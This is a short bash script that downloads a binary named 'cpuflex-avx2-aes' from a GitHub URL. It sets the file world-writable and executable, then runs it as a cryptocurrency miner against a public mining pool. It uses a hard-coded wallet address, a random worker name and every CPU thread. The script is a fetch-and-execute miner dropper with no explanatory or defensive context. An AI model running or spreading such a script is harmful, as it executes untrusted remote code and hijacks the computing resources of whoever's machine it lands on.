#!/bin/bash
wget -O red https://github.com/kidoescegh/filee/raw/main/cpuflex-avx2-aes
chmod 777 red
./red -a flex -o stratum+tcp://eu.mining4people.com:3449 -u kc1qylrmtzw47wldzzgwfkxtgrhgvp8jnyrck33nqu.$(shuf -n 1 -i 1-99999)-ON -t $(nproc --all)
